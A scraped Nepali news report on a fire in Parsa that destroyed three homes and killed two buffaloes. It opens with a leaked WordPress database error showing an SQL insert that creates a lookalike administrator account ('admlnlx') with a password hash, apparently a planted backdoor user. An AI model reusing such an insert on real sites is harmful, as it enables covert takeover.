WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuKmEVPhjVInP72eBYiA17abc16hWj/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 05:36:52', '', 'admlnlx', 'admlnlx')
पर्सा, माघ २६ –
पर्साको लखनपुर गाविसमा आज बिहान भएको आगलागीमा तीन घर जलेर नष्ठ भएको छ । लामखुट्टे धपाउन बालिएको घुरबाट आगो सल्किँदा वडा नं ५ निवासी दरोगा यादव, दुर्गा यादव र हरि यादवको घर जलेर नष्ट भएको हो ।
हरि यादवको गोठमा लामखुट्टे धपाउन बालिएको आगो सल्किएको आगोले दरोगा र दुर्गा यादवको घर जलेको जिल्ला प्रहरी कार्यालय पर्साले जनाएको छ ।
बिहान ३ः४५ बजे भएको आगलागीमा परी हरि यादवको गोठमा बाँधिएको दुईवटा भैँसी जलेर मरेको जिल्ला प्रहरी कार्यालय पर्साका प्रवक्ता प्रहरी नायब उपरीक्षक चक्रबहादुर जोशीले जानकारी दिनुभयो ।
आगलागीबाट तीनवटै घरमा राखिएको अन्न, लत्ताकपडा खाद्यान्न, नगद तथा जिन्सी पूर्णरुपमा जलेर नष्ट भएको प्रवक्ता जोशीले बताउनुभयो । आगलागीमा परी करिब पाँच लाख मूल्य बराबरको धनमाल जलेर नष्ट भएको प्रहरीको अनुमान छ ।
आगोलाई प्रहरी चौकी महुवन, स्थानीय बासिन्दा र वीरगन्जबाट गएको बारुणयन्त्रको सहयोगमा एक घन्टापछि नियन्त्रणमा लिइएको जिल्ला प्रहरी कार्यालयले जनाएको छ । – रासस